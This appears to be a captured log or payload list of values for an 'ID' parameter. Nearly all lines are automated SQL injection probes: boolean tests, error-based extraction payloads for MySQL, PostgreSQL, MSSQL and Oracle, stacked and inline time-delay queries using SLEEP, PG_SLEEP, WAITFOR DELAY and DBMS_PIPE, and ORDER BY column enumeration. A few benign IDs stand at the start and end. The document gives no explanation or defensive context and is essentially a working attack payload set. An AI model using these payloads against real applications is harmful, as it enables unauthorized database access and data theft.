ID:1
ID:1
ID:1
ID:8919
ID:1.((,.,)"')
ID:1'TwPaiQ<'">KZnOVY
ID:1) AND 9894=3257 AND (7431=7431
ID:1 AND 1945=1010
ID:1 AND 5870=8893-- lBWy
ID:1') AND 6599=6438 AND ('YsPQ'='YsPQ
ID:1' AND 6262=3745 AND 'vyub'='vyub
ID:(SELECT (CASE WHEN (8878=2900) THEN 1 ELSE (SELECT 2900 UNION SELECT 5674) END))
ID:1) AND (SELECT 9098 FROM(SELECT COUNT(*),CONCAT(0x7162717171,(SELECT (ELT(9098=9098,1))),0x717a766271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (1985=1985
ID:1 AND (SELECT 9098 FROM(SELECT COUNT(*),CONCAT(0x7162717171,(SELECT (ELT(9098=9098,1))),0x717a766271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
ID:1 AND (SELECT 9098 FROM(SELECT COUNT(*),CONCAT(0x7162717171,(SELECT (ELT(9098=9098,1))),0x717a766271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- tSrg
ID:1') AND (SELECT 9098 FROM(SELECT COUNT(*),CONCAT(0x7162717171,(SELECT (ELT(9098=9098,1))),0x717a766271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('yhvC'='yhvC
ID:1' AND (SELECT 9098 FROM(SELECT COUNT(*),CONCAT(0x7162717171,(SELECT (ELT(9098=9098,1))),0x717a766271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'oCGY'='oCGY
ID:1) AND 7136=CAST((CHR(113)||CHR(98)||CHR(113)||CHR(113)||CHR(113))||(SELECT (CASE WHEN (7136=7136) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(118)||CHR(98)||CHR(113)) AS NUMERIC) AND (8248=8248
ID:1 AND 7136=CAST((CHR(113)||CHR(98)||CHR(113)||CHR(113)||CHR(113))||(SELECT (CASE WHEN (7136=7136) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(118)||CHR(98)||CHR(113)) AS NUMERIC)
ID:1 AND 7136=CAST((CHR(113)||CHR(98)||CHR(113)||CHR(113)||CHR(113))||(SELECT (CASE WHEN (7136=7136) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(118)||CHR(98)||CHR(113)) AS NUMERIC)-- ZKLZ
ID:1') AND 7136=CAST((CHR(113)||CHR(98)||CHR(113)||CHR(113)||CHR(113))||(SELECT (CASE WHEN (7136=7136) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(118)||CHR(98)||CHR(113)) AS NUMERIC) AND ('HrSO'='HrSO
ID:1' AND 7136=CAST((CHR(113)||CHR(98)||CHR(113)||CHR(113)||CHR(113))||(SELECT (CASE WHEN (7136=7136) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(118)||CHR(98)||CHR(113)) AS NUMERIC) AND 'ZqwO'='ZqwO
ID:1) AND 4929 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(113)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (4929=4929) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(98)+CHAR(113))) AND (6928=6928
ID:1 AND 4929 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(113)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (4929=4929) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(98)+CHAR(113)))
ID:1 AND 4929 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(113)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (4929=4929) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(98)+CHAR(113)))-- Acsi
ID:1') AND 4929 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(113)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (4929=4929) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(98)+CHAR(113))) AND ('AvPE'='AvPE
ID:1' AND 4929 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(113)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (4929=4929) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(98)+CHAR(113))) AND 'gDgr'='gDgr
ID:1) AND 1068=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(113)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (1068=1068) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(118)||CHR(98)||CHR(113)||CHR(62))) FROM DUAL) AND (4770=4770
ID:1 AND 1068=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(113)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (1068=1068) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(118)||CHR(98)||CHR(113)||CHR(62))) FROM DUAL)
ID:1 AND 1068=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(113)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (1068=1068) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(118)||CHR(98)||CHR(113)||CHR(62))) FROM DUAL)-- xsFI
ID:1') AND 1068=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(113)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (1068=1068) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(118)||CHR(98)||CHR(113)||CHR(62))) FROM DUAL) AND ('VnPA'='VnPA
ID:1' AND 1068=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(113)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (1068=1068) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(118)||CHR(98)||CHR(113)||CHR(62))) FROM DUAL) AND 'xJLn'='xJLn
ID:(SELECT 2078 FROM(SELECT COUNT(*),CONCAT(0x7162717171,(SELECT (ELT(2078=2078,1))),0x717a766271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
ID:(SELECT CONCAT(CONCAT('qbqqq',(CASE WHEN (6132=6132) THEN '1' ELSE '0' END)),'qzvbq'))
ID:1);SELECT PG_SLEEP(5)--
ID:1;SELECT PG_SLEEP(5)--
ID:1');SELECT PG_SLEEP(5)--
ID:1';SELECT PG_SLEEP(5)--
ID:1);WAITFOR DELAY '0:0:5'--
ID:1;WAITFOR DELAY '0:0:5'--
ID:1');WAITFOR DELAY '0:0:5'--
ID:1';WAITFOR DELAY '0:0:5'--
ID:1);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(81)||CHR(65)||CHR(89)||CHR(114),5) FROM DUAL--
ID:1;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(81)||CHR(65)||CHR(89)||CHR(114),5) FROM DUAL--
ID:1');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(81)||CHR(65)||CHR(89)||CHR(114),5) FROM DUAL--
ID:1';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(81)||CHR(65)||CHR(89)||CHR(114),5) FROM DUAL--
ID:1) AND (SELECT 8088 FROM (SELECT(SLEEP(5)))GxGV) AND (7732=7732
ID:1 AND (SELECT 8088 FROM (SELECT(SLEEP(5)))GxGV)
ID:1 AND (SELECT 8088 FROM (SELECT(SLEEP(5)))GxGV)-- uMUm
ID:1') AND (SELECT 8088 FROM (SELECT(SLEEP(5)))GxGV) AND ('fhtS'='fhtS
ID:1' AND (SELECT 8088 FROM (SELECT(SLEEP(5)))GxGV) AND 'HfTP'='HfTP
ID:1) AND 5876=(SELECT 5876 FROM PG_SLEEP(5)) AND (4514=4514
ID:1 AND 5876=(SELECT 5876 FROM PG_SLEEP(5))
ID:1 AND 5876=(SELECT 5876 FROM PG_SLEEP(5))-- iOCr
ID:1') AND 5876=(SELECT 5876 FROM PG_SLEEP(5)) AND ('iNZO'='iNZO
ID:1' AND 5876=(SELECT 5876 FROM PG_SLEEP(5)) AND 'Hbay'='Hbay
ID:1) WAITFOR DELAY '0:0:5' AND (2094=2094
ID:1 WAITFOR DELAY '0:0:5'
ID:1 WAITFOR DELAY '0:0:5'-- aMtV
ID:1') WAITFOR DELAY '0:0:5' AND ('fMQq'='fMQq
ID:1' WAITFOR DELAY '0:0:5' AND 'eBzt'='eBzt
ID:1) AND 7076=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(85)||CHR(75)||CHR(100),5) AND (7020=7020
ID:1 AND 7076=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(85)||CHR(75)||CHR(100),5)
ID:1 AND 7076=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(85)||CHR(75)||CHR(100),5)-- dnKb
ID:1') AND 7076=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(85)||CHR(75)||CHR(100),5) AND ('yEsQ'='yEsQ
ID:1' AND 7076=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(85)||CHR(75)||CHR(100),5) AND 'XDnd'='XDnd
ID:1) ORDER BY 1-- AiQT
ID:1) ORDER BY 8038-- KvuN
ID:1 ORDER BY 1-- KlwF
ID:1 ORDER BY 5937-- nnIy
ID:1 ORDER BY 1-- qmIY
ID:1 ORDER BY 1099-- dKVi
ID:1') ORDER BY 1-- DwLr
ID:1') ORDER BY 8571-- dNHL
ID:1' ORDER BY 1-- UDjb
ID:1' ORDER BY 5957-- GGpO
ID:1
ID:1
ID:2
ID:admin
ID:1
ID:'1'
ID:
ID:-1
ID:1
ID:1
ID:1
ID:2
